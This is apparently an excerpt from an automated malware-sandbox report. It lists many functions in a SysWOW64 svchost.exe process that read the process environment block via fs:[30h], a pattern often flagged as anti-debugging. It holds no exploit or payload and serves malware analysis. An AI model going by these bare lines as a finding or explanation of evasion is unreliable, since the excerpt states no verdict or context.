          Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_030402A0 mov eax, dword ptr fs:[00000030h] 1_2_030402A0
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_030C62A0 mov eax, dword ptr fs:[00000030h] 1_2_030C62A0
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_030C62A0 mov ecx, dword ptr fs:[00000030h] 1_2_030C62A0
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0303A2C3 mov eax, dword ptr fs:[00000030h] 1_2_0303A2C3
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_031062D6 mov eax, dword ptr fs:[00000030h] 1_2_031062D6
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_030402E1 mov eax, dword ptr fs:[00000030h] 1_2_030402E1
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_030DE10E mov eax, dword ptr fs:[00000030h] 1_2_030DE10E
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_030DE10E mov ecx, dword ptr fs:[00000030h] 1_2_030DE10E
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_030DA118 mov ecx, dword ptr fs:[00000030h] 1_2_030DA118
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_030DA118 mov eax, dword ptr fs:[00000030h] 1_2_030DA118
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_030F0115 mov eax, dword ptr fs:[00000030h] 1_2_030F0115
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03060124 mov eax, dword ptr fs:[00000030h]1_2_03060124
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030C4144 mov eax, dword ptr fs:[00000030h]1_2_030C4144
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030C4144 mov eax, dword ptr fs:[00000030h]1_2_030C4144
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030C4144 mov ecx, dword ptr fs:[00000030h]1_2_030C4144
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030C4144 mov eax, dword ptr fs:[00000030h]1_2_030C4144
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030C4144 mov eax, dword ptr fs:[00000030h]1_2_030C4144
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0302C156 mov eax, dword ptr fs:[00000030h]1_2_0302C156
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030C8158 mov eax, dword ptr fs:[00000030h]1_2_030C8158
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03036154 mov eax, dword ptr fs:[00000030h]1_2_03036154
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03036154 mov eax, dword ptr fs:[00000030h]1_2_03036154
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03104164 mov eax, dword ptr fs:[00000030h]1_2_03104164
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03104164 mov eax, dword ptr fs:[00000030h]1_2_03104164
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03070185 mov eax, dword ptr fs:[00000030h]1_2_03070185
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030EC188 mov eax, dword ptr fs:[00000030h]1_2_030EC188
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030EC188 mov eax, dword ptr fs:[00000030h]1_2_030EC188
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030D4180 mov eax, dword ptr fs:[00000030h]1_2_030D4180
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030D4180 mov eax, dword ptr fs:[00000030h]1_2_030D4180
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030B019F mov eax, dword ptr fs:[00000030h]1_2_030B019F
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030B019F mov eax, dword ptr fs:[00000030h]1_2_030B019F
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030B019F mov eax, dword ptr fs:[00000030h]1_2_030B019F
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030B019F mov eax, dword ptr fs:[00000030h]1_2_030B019F
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0302A197 mov eax, dword ptr fs:[00000030h]1_2_0302A197
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0302A197 mov eax, dword ptr fs:[00000030h]1_2_0302A197
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0302A197 mov eax, dword ptr fs:[00000030h]1_2_0302A197
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030F61C3 mov eax, dword ptr fs:[00000030h]1_2_030F61C3
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030F61C3 mov eax, dword ptr fs:[00000030h]1_2_030F61C3
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030AE1D0 mov eax, dword ptr fs:[00000030h]1_2_030AE1D0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030AE1D0 mov eax, dword ptr fs:[00000030h]1_2_030AE1D0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030AE1D0 mov ecx, dword ptr fs:[00000030h]1_2_030AE1D0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030AE1D0 mov eax, dword ptr fs:[00000030h]1_2_030AE1D0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030AE1D0 mov eax, dword ptr fs:[00000030h]1_2_030AE1D0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031061E5 mov eax, dword ptr fs:[00000030h]1_2_031061E5
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030601F8 mov eax, dword ptr fs:[00000030h]1_2_030601F8
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030B4000 mov ecx, dword ptr fs:[00000030h]1_2_030B4000
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030D2000 mov eax, dword ptr fs:[00000030h]1_2_030D2000
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030D2000 mov eax, dword ptr fs:[00000030h]1_2_030D2000
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030D2000 mov eax, dword ptr fs:[00000030h]1_2_030D2000
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030D2000 mov eax, dword ptr fs:[00000030h]1_2_030D2000
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030D2000 mov eax, dword ptr fs:[00000030h]1_2_030D2000
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030D2000 mov eax, dword ptr fs:[00000030h]1_2_030D2000
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030D2000 mov eax, dword ptr fs:[00000030h]1_2_030D2000
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030D2000 mov eax, dword ptr fs:[00000030h]1_2_030D2000
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0304E016 mov eax, dword ptr fs:[00000030h]1_2_0304E016
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0304E016 mov eax, dword ptr fs:[00000030h]1_2_0304E016
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0304E016 mov eax, dword ptr fs:[00000030h]1_2_0304E016
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0304E016 mov eax, dword ptr fs:[00000030h]1_2_0304E016
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0302A020 mov eax, dword ptr fs:[00000030h]1_2_0302A020
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0302C020 mov eax, dword ptr fs:[00000030h]1_2_0302C020
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030C6030 mov eax, dword ptr fs:[00000030h]1_2_030C6030
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03032050 mov eax, dword ptr fs:[00000030h]1_2_03032050
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030B6050 mov eax, dword ptr fs:[00000030h]1_2_030B6050
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0305C073 mov eax, dword ptr fs:[00000030h]1_2_0305C073
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0303208A mov eax, dword ptr fs:[00000030h]1_2_0303208A
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030280A0 mov eax, dword ptr fs:[00000030h]1_2_030280A0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030C80A8 mov eax, dword ptr fs:[00000030h]1_2_030C80A8
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030F60B8 mov eax, dword ptr fs:[00000030h]1_2_030F60B8
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030F60B8 mov ecx, dword ptr fs:[00000030h]1_2_030F60B8
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030B20DE mov eax, dword ptr fs:[00000030h]1_2_030B20DE
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0302A0E3 mov ecx, dword ptr fs:[00000030h]1_2_0302A0E3
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030380E9 mov eax, dword ptr fs:[00000030h]1_2_030380E9
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030B60E0 mov eax, dword ptr fs:[00000030h]1_2_030B60E0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0302C0F0 mov eax, dword ptr fs:[00000030h]1_2_0302C0F0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030720F0 mov ecx, dword ptr fs:[00000030h]1_2_030720F0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0306C700 mov eax, dword ptr fs:[00000030h]1_2_0306C700
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03030710 mov eax, dword ptr fs:[00000030h]1_2_03030710
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03060710 mov eax, dword ptr fs:[00000030h]1_2_03060710
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0306C720 mov eax, dword ptr fs:[00000030h]1_2_0306C720
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0306C720 mov eax, dword ptr fs:[00000030h]1_2_0306C720
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0306273C mov eax, dword ptr fs:[00000030h]1_2_0306273C
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0306273C mov ecx, dword ptr fs:[00000030h]1_2_0306273C
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0306273C mov eax, dword ptr fs:[00000030h]1_2_0306273C
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030AC730 mov eax, dword ptr fs:[00000030h]1_2_030AC730
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0306674D mov esi, dword ptr fs:[00000030h]1_2_0306674D
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0306674D mov eax, dword ptr fs:[00000030h]1_2_0306674D
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0306674D mov eax, dword ptr fs:[00000030h]1_2_0306674D
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03030750 mov eax, dword ptr fs:[00000030h]1_2_03030750
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030BE75D mov eax, dword ptr fs:[00000030h]1_2_030BE75D
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03072750 mov eax, dword ptr fs:[00000030h]1_2_03072750
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03072750 mov eax, dword ptr fs:[00000030h]1_2_03072750
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030B4755 mov eax, dword ptr fs:[00000030h]1_2_030B4755
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03038770 mov eax, dword ptr fs:[00000030h]1_2_03038770
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03040770 mov eax, dword ptr fs:[00000030h]1_2_03040770
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03040770 mov eax, dword ptr fs:[00000030h]1_2_03040770
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03040770 mov eax, dword ptr fs:[00000030h]1_2_03040770
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03040770 mov eax, dword ptr fs:[00000030h]1_2_03040770
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03040770 mov eax, dword ptr fs:[00000030h]1_2_03040770
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03040770 mov eax, dword ptr fs:[00000030h]1_2_03040770
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03040770 mov eax, dword ptr fs:[00000030h]1_2_03040770
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03040770 mov eax, dword ptr fs:[00000030h]1_2_03040770
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03040770 mov eax, dword ptr fs:[00000030h]1_2_03040770
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03040770 mov eax, dword ptr fs:[00000030h]1_2_03040770
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03040770 mov eax, dword ptr fs:[00000030h]1_2_03040770
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03040770 mov eax, dword ptr fs:[00000030h]1_2_03040770
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030D678E mov eax, dword ptr fs:[00000030h]1_2_030D678E
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030307AF mov eax, dword ptr fs:[00000030h]1_2_030307AF
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030E47A0 mov eax, dword ptr fs:[00000030h]1_2_030E47A0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0303C7C0 mov eax, dword ptr fs:[00000030h]1_2_0303C7C0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030B07C3 mov eax, dword ptr fs:[00000030h]1_2_030B07C3
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030527ED mov eax, dword ptr fs:[00000030h]1_2_030527ED
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030527ED mov eax, dword ptr fs:[00000030h]1_2_030527ED
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030527ED mov eax, dword ptr fs:[00000030h]1_2_030527ED
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030BE7E1 mov eax, dword ptr fs:[00000030h]1_2_030BE7E1
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030347FB mov eax, dword ptr fs:[00000030h]1_2_030347FB
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030347FB mov eax, dword ptr fs:[00000030h]1_2_030347FB
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030AE609 mov eax, dword ptr fs:[00000030h]1_2_030AE609
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0304260B mov eax, dword ptr fs:[00000030h]1_2_0304260B
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0304260B mov eax, dword ptr fs:[00000030h]1_2_0304260B
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0304260B mov eax, dword ptr fs:[00000030h]1_2_0304260B
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0304260B mov eax, dword ptr fs:[00000030h]1_2_0304260B
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0304260B mov eax, dword ptr fs:[00000030h]1_2_0304260B
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0304260B mov eax, dword ptr fs:[00000030h]1_2_0304260B
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0304260B mov eax, dword ptr fs:[00000030h]1_2_0304260B
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03072619 mov eax, dword ptr fs:[00000030h]1_2_03072619
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0304E627 mov eax, dword ptr fs:[00000030h]1_2_0304E627
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03066620 mov eax, dword ptr fs:[00000030h]1_2_03066620
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03068620 mov eax, dword ptr fs:[00000030h]1_2_03068620
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0303262C mov eax, dword ptr fs:[00000030h]1_2_0303262C
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0304C640 mov eax, dword ptr fs:[00000030h]1_2_0304C640
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030F866E mov eax, dword ptr fs:[00000030h]1_2_030F866E
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030F866E mov eax, dword ptr fs:[00000030h]1_2_030F866E
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0306A660 mov eax, dword ptr fs:[00000030h]1_2_0306A660
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0306A660 mov eax, dword ptr fs:[00000030h]1_2_0306A660
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03062674 mov eax, dword ptr fs:[00000030h]1_2_03062674
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03034690 mov eax, dword ptr fs:[00000030h]1_2_03034690
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03034690 mov eax, dword ptr fs:[00000030h]1_2_03034690
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0306C6A6 mov eax, dword ptr fs:[00000030h]1_2_0306C6A6
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030666B0 mov eax, dword ptr fs:[00000030h]1_2_030666B0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0306A6C7 mov ebx, dword ptr fs:[00000030h]1_2_0306A6C7
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0306A6C7 mov eax, dword ptr fs:[00000030h]1_2_0306A6C7
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030AE6F2 mov eax, dword ptr fs:[00000030h]1_2_030AE6F2
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030AE6F2 mov eax, dword ptr fs:[00000030h]1_2_030AE6F2
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030AE6F2 mov eax, dword ptr fs:[00000030h]1_2_030AE6F2
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030AE6F2 mov eax, dword ptr fs:[00000030h]1_2_030AE6F2
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030B06F1 mov eax, dword ptr fs:[00000030h]1_2_030B06F1
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030B06F1 mov eax, dword ptr fs:[00000030h]1_2_030B06F1
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030C6500 mov eax, dword ptr fs:[00000030h]1_2_030C6500
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03104500 mov eax, dword ptr fs:[00000030h]1_2_03104500
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03104500 mov eax, dword ptr fs:[00000030h]1_2_03104500
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03104500 mov eax, dword ptr fs:[00000030h]1_2_03104500
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03104500 mov eax, dword ptr fs:[00000030h]1_2_03104500
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03104500 mov eax, dword ptr fs:[00000030h]1_2_03104500
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03104500 mov eax, dword ptr fs:[00000030h]1_2_03104500
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03104500 mov eax, dword ptr fs:[00000030h]1_2_03104500
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03040535 mov eax, dword ptr fs:[00000030h]1_2_03040535
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03040535 mov eax, dword ptr fs:[00000030h]1_2_03040535
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03040535 mov eax, dword ptr fs:[00000030h]1_2_03040535
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03040535 mov eax, dword ptr fs:[00000030h]1_2_03040535
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03040535 mov eax, dword ptr fs:[00000030h]1_2_03040535
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03040535 mov eax, dword ptr fs:[00000030h]1_2_03040535
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0305E53E mov eax, dword ptr fs:[00000030h]1_2_0305E53E
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0305E53E mov eax, dword ptr fs:[00000030h]1_2_0305E53E
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0305E53E mov eax, dword ptr fs:[00000030h]1_2_0305E53E
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0305E53E mov eax, dword ptr fs:[00000030h]1_2_0305E53E
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0305E53E mov eax, dword ptr fs:[00000030h]1_2_0305E53E
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03038550 mov eax, dword ptr fs:[00000030h]1_2_03038550
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03038550 mov eax, dword ptr fs:[00000030h]1_2_03038550
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0306656A mov eax, dword ptr fs:[00000030h]1_2_0306656A
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0306656A mov eax, dword ptr fs:[00000030h]1_2_0306656A
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0306656A mov eax, dword ptr fs:[00000030h]1_2_0306656A
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03032582 mov eax, dword ptr fs:[00000030h]1_2_03032582
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03032582 mov ecx, dword ptr fs:[00000030h]1_2_03032582
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03064588 mov eax, dword ptr fs:[00000030h]1_2_03064588
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0306E59C mov eax, dword ptr fs:[00000030h]1_2_0306E59C
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030B05A7 mov eax, dword ptr fs:[00000030h]1_2_030B05A7
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030B05A7 mov eax, dword ptr fs:[00000030h]1_2_030B05A7
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030B05A7 mov eax, dword ptr fs:[00000030h]1_2_030B05A7
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030545B1 mov eax, dword ptr fs:[00000030h]1_2_030545B1
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030545B1 mov eax, dword ptr fs:[00000030h]1_2_030545B1
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0306E5CF mov eax, dword ptr fs:[00000030h]1_2_0306E5CF
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0306E5CF mov eax, dword ptr fs:[00000030h]1_2_0306E5CF
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030365D0 mov eax, dword ptr fs:[00000030h]1_2_030365D0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0306A5D0 mov eax, dword ptr fs:[00000030h]1_2_0306A5D0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0306A5D0 mov eax, dword ptr fs:[00000030h]1_2_0306A5D0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0305E5E7 mov eax, dword ptr fs:[00000030h]1_2_0305E5E7
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0305E5E7 mov eax, dword ptr fs:[00000030h]1_2_0305E5E7
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0305E5E7 mov eax, dword ptr fs:[00000030h]1_2_0305E5E7
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0305E5E7 mov eax, dword ptr fs:[00000030h]1_2_0305E5E7
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0305E5E7 mov eax, dword ptr fs:[00000030h]1_2_0305E5E7
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0305E5E7 mov eax, dword ptr fs:[00000030h]1_2_0305E5E7
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0305E5E7 mov eax, dword ptr fs:[00000030h]1_2_0305E5E7
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0305E5E7 mov eax, dword ptr fs:[00000030h]1_2_0305E5E7
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030325E0 mov eax, dword ptr fs:[00000030h]1_2_030325E0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0306C5ED mov eax, dword ptr fs:[00000030h]1_2_0306C5ED
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0306C5ED mov eax, dword ptr fs:[00000030h]1_2_0306C5ED
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03068402 mov eax, dword ptr fs:[00000030h]1_2_03068402
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03068402 mov eax, dword ptr fs:[00000030h]1_2_03068402
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03068402 mov eax, dword ptr fs:[00000030h]1_2_03068402
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0302E420 mov eax, dword ptr fs:[00000030h]1_2_0302E420
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0302E420 mov eax, dword ptr fs:[00000030h]1_2_0302E420
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0302E420 mov eax, dword ptr fs:[00000030h]1_2_0302E420
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0302C427 mov eax, dword ptr fs:[00000030h]1_2_0302C427
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030B6420 mov eax, dword ptr fs:[00000030h]1_2_030B6420
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030B6420 mov eax, dword ptr fs:[00000030h]1_2_030B6420
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030B6420 mov eax, dword ptr fs:[00000030h]1_2_030B6420
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030B6420 mov eax, dword ptr fs:[00000030h]1_2_030B6420
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030B6420 mov eax, dword ptr fs:[00000030h]1_2_030B6420
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030B6420 mov eax, dword ptr fs:[00000030h]1_2_030B6420
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030B6420 mov eax, dword ptr fs:[00000030h]1_2_030B6420
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0306E443 mov eax, dword ptr fs:[00000030h]1_2_0306E443
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0306E443 mov eax, dword ptr fs:[00000030h]1_2_0306E443
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0306E443 mov eax, dword ptr fs:[00000030h]1_2_0306E443
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0306E443 mov eax, dword ptr fs:[00000030h]1_2_0306E443
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0306E443 mov eax, dword ptr fs:[00000030h]1_2_0306E443
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0306E443 mov eax, dword ptr fs:[00000030h]1_2_0306E443
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0306E443 mov eax, dword ptr fs:[00000030h]1_2_0306E443
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0306E443 mov eax, dword ptr fs:[00000030h]1_2_0306E443
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030EA456 mov eax, dword ptr fs:[00000030h]1_2_030EA456
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0302645D mov eax, dword ptr fs:[00000030h]1_2_0302645D
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0305245A mov eax, dword ptr fs:[00000030h]1_2_0305245A
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030BC460 mov ecx, dword ptr fs:[00000030h]1_2_030BC460
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0305A470 mov eax, dword ptr fs:[00000030h]1_2_0305A470
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0305A470 mov eax, dword ptr fs:[00000030h]1_2_0305A470
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0305A470 mov eax, dword ptr fs:[00000030h]1_2_0305A470
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030EA49A mov eax, dword ptr fs:[00000030h]1_2_030EA49A
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030364AB mov eax, dword ptr fs:[00000030h]1_2_030364AB
